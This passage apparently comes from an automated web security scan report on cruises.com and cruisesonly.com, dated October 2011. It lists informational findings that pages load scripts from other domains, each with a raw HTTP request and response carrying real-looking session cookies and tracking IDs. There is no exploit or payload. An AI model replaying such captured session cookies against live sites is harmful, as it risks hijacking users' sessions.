Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.8.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:36 GMT
Server: Apache
Content-Length: 129897
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:44:36 GMT;path=/


<script language='JavaScript' src='/lib/javascript/ajax/jquery/jquery-1.6.3.min.js'></script>
<script language="javascript" src="/Code/javascript/ajax/jquery/jquery.form.js" type="text/java
...[SNIP]...
<div >


<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!--topcruises.ftl end-->

           
               <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<div align="center">


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
18.17. http://www.cruises.com/results.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /results.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/promotion/weekend-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6383; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.13.8.1317645863557; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:05 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:44:06 GMT; Path=/
Set-Cookie: IncludeAlumniRates=true; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: IncludeSeniorRates=true; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: AlumniCruiseId=44; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: shoppingZipCode=10010; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:46:06 GMT;path=/
Cache-Control: private
Content-Length: 177692


<html>
<head profile="http://www.w3.org/2005/10/profile">


           <META NAME="Description" CONTENT="Find the best cruise and vacation deals on the Internet, make cruise and hote
...[SNIP]...
<!--
   server and timestamp info:blweb23:Mon Oct 03 08:44:05 EDT 2011
-->
   

<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>    
   

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</table>
   

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
18.18. http://www.cruises.com/sc.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /sc.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sc.do?d=10/03/2011&d2=04/02/2014&i=852431&c=1&v=46&IncludeAlumniRates=true&IncludeSeniorRates=true&zipcode=10010&statecode=&dsc=y HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.18.9.1317645980928; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; IncludeAlumniRates=true; IncludeSeniorRates=true; AlumniCruiseId=44; shoppingZipCode=10010; EmailSignupComplete=Yes; AFF%5FCID=%22%22; sid=6383; JSESSIONID=6FC45782F4EC10BBA7768E419D7F36EA; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:46:11 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:46:12 GMT; Path=/
Set-Cookie: IncludeAlumniRates=true; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: IncludeSeniorRates=true; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: AlumniCruiseId=44; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: shoppingZipCode=10010; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: EmailSignupComplete=Yes; Expires=Tue, 02-Oct-2012 12:46:12 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:48:12 GMT;path=/
Cache-Control: private
Content-Length: 479627


<html>
<head profile="http://www.w3.org/2005/10/profile">


           <META NAME="Description" CONTENT="Find the best cruise and vacation deals on the Internet, make cruise and hote
...[SNIP]...
<!--
   server and timestamp info:blweb18:Mon Oct 03 08:46:11 EDT 2011
-->
   

<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
           
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js"></script>
...[SNIP]...
</table>


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
18.19. http://www.cruisesonly.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:40:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 107318
Content-Type: text/html
Cache-control: private
Content-Length: 107318


<script language="javascript" src="/lib/javascript/ajax/jquery/jquery-1.6.3.min.js" type="text/javascript"></script>
<script language="javascript" src="/Code/javascript/ajax/jquery/jquery.form.js"
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- google service script -->
           <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
           </script>
...[SNIP]...
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

                   <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript">
                   </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
18.20. http://www.cruisesonly.com/cs/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /cs/default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cs/default.asp HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/groupcruises/promos/whatisgroup.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.4.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 95828
Content-Type: text/html
Set-Cookie: AFF%5FCID=%22%22; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACRRBDRT=LCAAOGNALNLIEDHCBDAMGOOP; path=/
Cache-control: private
Content-Length: 95828


<script language="JavaScript">


    function CallUrchin(event_name)
{
       
           pageTracker._trackPageview(event_name);
           //alert(event_name);
       
       return true;
}
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
18.21. http://www.cruisesonly.com/groupcruises/promos/whatisgroup.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /groupcruises/promos/whatisgroup.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /groupcruises/promos/whatisgroup.asp HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/sc.do?d=09/07/2011&d2=03/06/2014&i=848192&c=11&v=58&IncludeAlumniRates=&IncludeSeniorRates=&state=&zipcode=&dsc=y
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.3.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 55607
Content-Type: text/html
Set-Cookie: AFF%5FCID=%22%22; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 55607


<script language="javascript" src="/code/webdata/webdataregister.asp?webdataID=1910"></script>

<script language="javascript" src="/Code/javascript/JSPopup.js"></script>
<script language="java
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
18.22. http://www.cruisesonly.com/includes/search_ads.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /includes/search_ads.css

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /includes/search_ads.css HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 file not found
Date: Mon, 03 Oct 2011 12:45:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 46271
Content-Type: text/html
Set-Cookie: AFF%5FCID=6386; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 46271


<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/lib/global/jscookiehelp.asp?js=N">
</noscript>
<script language='Javascript'><!--function DummyBrowserCheck11() {
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- google service script -->
           <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
           </script>
...[SNIP]...
18.23. http://www.cruisesonly.com/includes/stylesheet_test.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /includes/stylesheet_test.css

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /includes/stylesheet_test.css HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.2.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 file not found
Date: Mon, 03 Oct 2011 12:40:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 45933
Content-Type: text/html
Cache-control: private
Content-Length: 45933


<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/lib/global/jscookiehelp.asp?js=N">
</noscript>
<script language='Javascript'><!--function DummyBrowserCheck11() {
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- google service script -->
           <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
           </script>
...[SNIP]...
18.24. http://www.cruisesonly.com/lib/javascript/ajax/logerror.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /lib/javascript/ajax/logerror.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lib/javascript/ajax/logerror.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 file not found
Date: Mon, 03 Oct 2011 12:40:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 45933
Content-Type: text/html
Cache-control: private
Content-Length: 45933


<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/lib/global/jscookiehelp.asp?js=N">
</noscript>
<script language='Javascript'><!--function DummyBrowserCheck11() {
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- google service script -->
           <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
           </script>
...[SNIP]...
18.25. http://www.cruisesonly.com/promotion/bermuda-cruises.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /promotion/bermuda-cruises.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /promotion/bermuda-cruises.do HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:23 GMT
Server: Apache
Content-Length: 116327
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:47:23 GMT;path=/


<script language='JavaScript' src='/lib/javascript/ajax/jquery/jquery-1.6.3.min.js'></script>
<script language="javascript" src="/Code/javascript/ajax/jquery/jquery.form.js" type="text/java
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<br />
   <script src="http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript">
   </script>
...[SNIP]...
<!--topcruises.ftl end-->

           
               <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- END OF TAG FOR SLOT ad_promo_sky -->
                                           
                               
                    <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
18.26. http://www.cruisesonly.com/sc.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /sc.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sc.do?d=09/07/2011&d2=03/06/2014&i=848192&c=11&v=58&IncludeAlumniRates=&IncludeSeniorRates=&state=&zipcode=&dsc=y HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.2.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:18 GMT
Server: Apache
Set-Cookie: WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; Expires=Thu, 30-Sep-2021 12:41:18 GMT; Path=/
Set-Cookie: IncludeAlumniRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: IncludeSeniorRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AlumniCruiseId=false; Expires=Wed, 02-Nov-2011 12:41:18 GMT; Path=/
Set-Cookie: shoppingZipCode=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sid=6386; Path=/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:43:18 GMT;path=/
Cache-Control: private
Content-Length: 139727


<html>
<head profile="http://www.w3.org/2005/10/profile">


           <META NAME="Description" CONTENT="Find the best cruise and vacation deals on the Internet, make cruise and hote
...[SNIP]...
</script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
           
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js"></script>
...[SNIP]...
<!-- PUT THIS GOOGLE TAG IN THE head SECTION -->
   
   <script type="text/javascript"
   src="http://partner.googleadservices.com/gampad/google_service.js">
   </script>
...[SNIP]...
18.27. https://www.cruisesonly.com/bcss/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
